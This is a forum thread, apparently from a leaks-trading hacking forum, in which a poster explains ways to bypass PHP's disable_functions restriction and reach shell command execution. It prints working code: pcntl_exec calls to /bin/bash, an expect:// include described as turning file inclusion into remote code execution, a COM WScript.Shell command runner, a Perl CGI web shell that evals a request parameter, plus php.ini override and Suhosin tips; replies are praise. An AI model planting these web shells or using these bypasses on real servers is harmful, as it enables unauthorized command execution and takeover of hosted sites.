Create an account

Very important

• To access the important data of the forums, you must be active in each forum and especially in the leaks and database leaks section, send data and after sending the data and activity, data and important content will be opened and visible for you.
  • You will only see chat messages from people who are at or below your level.
  • More than 500,000 database leaks and millions of account leaks are waiting for you, so access and view with more activity.
  • Many important data are inactive and inaccessible for you, so open them with activity. (This will be done automatically)

Thread Rating:
  • 603 Vote(s) - 3.44 Average
For those who struggle with disable_functions.

This is a thread I wrote for HF; it should be useful for beginners here that are willing to learn.
Some of you here, but not most (I assume), should already know about the "methods" I'm about to explain and provide examples of.
Let's begin.

Firstly, pcntl_exec() is usually overlooked because it's not apart of the default web package installation of PHP; the PCNTL extension is designed specifically to be utilized in a command-line environment.
It works identically to the *nix-style exec(); the process defined in the first argument of pcntl_exec() is replaced with the process calling it (php, in this case).
PCNTL is enabled by default in the CLI package of PHP, others will need to be compiled with the --enable-pcntl switch.
Bluehost has this extension enabled, just for the record.
PHP Code:
echo extension_loaded('pcntl') ? 'Yes' 'No';   // is_callable('pcntl_exec') if the extension is loaded, but you can't seem to call the function.
pcntl_exec('/bin/bash', array('-c''id'));

// You should note that anything after this won't get executed as php is being replaced with /bin/bash.
// Solution? Use pcntl_fork() to fork the current process (php), thus /bin/bash will replace the child process rather than the parent process. 

Next is the expect:// wrapper. It isn't included in PHP at all, so don't expect to see it around very much.
The

[To see links please register here]

extension is available for download on PECL (a repository for PHP extensions).
It basically provides access to the given process's STDIN, STDOUT and STDERR via PTY (mainly for SSH and protocols alike).
PHP Code:
echo in_array('expect'stream_get_wrappers()) ? 'Yes' 'No';
include(
'expect://id');   // Good for escalating LFI to RCE as well. 

(Component Object Model) allows you to manipulate applications and services that operate within Windows, independent of the programming language used in the target object.
As of PHP version 5.3.15, you'll need to add extension=php_com_dotnet.dll to your php.ini file where appropriate as it was removed. Previous versions of PHP should have it.
The following is a small example I came up with, it will execute a command and pipe it to STDOUT.
PHP Code:
// I usually see $shell->Run(), bad for backtracking SQL segments to the GPU's ALU circuit memory stack lulzsek; an integer is returned (it's how the OS validates success).

if(!(extension_loaded('com_dotnet') || dl('php_com_dotnet.dll')))   // Requires enable_dl to be "On" in php.ini.

die('Failed to load the COM extension.');

function 
wscript_exec($cmd)
{

$shell  = new COM('WScript.Shell');

$output $shell->Exec("cmd /C {$cmd}")->StdOut->ReadAll;

echo 
$output;
}

wscript_exec('dir');   // Usage example. 

A CGI shell coded in something other than PHP will probably prove to be the most effective method of circumventing disable_functions as it only applies to PHP.
Here's a quick one I wrote, this should be sufficient in most cases.
PHP Code:
#!/usr/bin/perl

use strict;
use 
CGI;

my $cgi = new CGI;
my $cmd $cgi->param('cmd');

print 
"Content-Type: text/html\r\n\r\n";
eval(
$cmd);   # Should be enough for non-retards. 

php.ini override is apparently still a plausible and working method.
This is caused by misconfiguration of SuPHP (suphp.conf); not forcing users to use the global php.ini file defined under [phprc_paths] and/or allowing users to have a php.ini within their public_html directory to specify configuration settings themselves.
What you need to do should be self-explanatory.

If your issue is Suhosin related, then you might want to read

to gain some insight on how one would circumvent it.
I'll just drop some self-explanatory code here, it might be useful if you're unsure if Suhosin is in the way.
PHP Code:
if(constant('SUHOSIN_PATCH') || extension_loaded('suhosin'))
    echo 
ini_get('suhosin.executor.func.blacklist'); 

Thank you for posting this, I really appreciate it!
Hopefully I'll be able to learn all of this. <3

I always love seeing people's disable_functions line. The funniest times were when people made typos.

Love it. Didn't we discuss this in-depth on Skype before it was posted to HF?

Quote:(10-08-2013, 06:43 AM)Oni Wrote:

I always love seeing people's disable_functions line. The funniest times were when people made typos.

Oh yes, the typos thing is a killer. So close and yet so far.

Quote:(10-08-2013, 06:32 AM)Starfall Wrote:

Love it. Didn't we discuss this in-depth on Skype before it was posted to HF?

Thank you.
We sure did. If my memory serves, I was telling you the methods I was writing about, and you mentioned the ini override, which I thought would have been dead by then.

Quote:(10-08-2013, 06:43 AM)Oni Wrote:

As do I. I find it somewhat funny when people post code and they have made that mistake.
I can see why people make the mistake; it sounds strange when read with ini_get() encapsulating the string, but it makes sense once you have taken it in the perspective of the developers, as you use ini_set() to disable functions for that runtime instance, which sounds more logical when read. That's how I imagine they came up with the name.